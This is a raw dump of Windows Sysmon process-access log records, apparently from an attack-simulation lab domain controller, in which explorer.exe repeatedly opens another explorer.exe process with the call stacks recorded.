16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244603Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244602Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244601Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244600Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244599Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244598Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244597Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244596Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244595Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244594Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244593Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244592Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244591Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244590Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244589Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244588Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244587Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244586Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244585Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244584Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244583Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244582Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244581Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244580Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244579Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244578Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244577Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244576Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 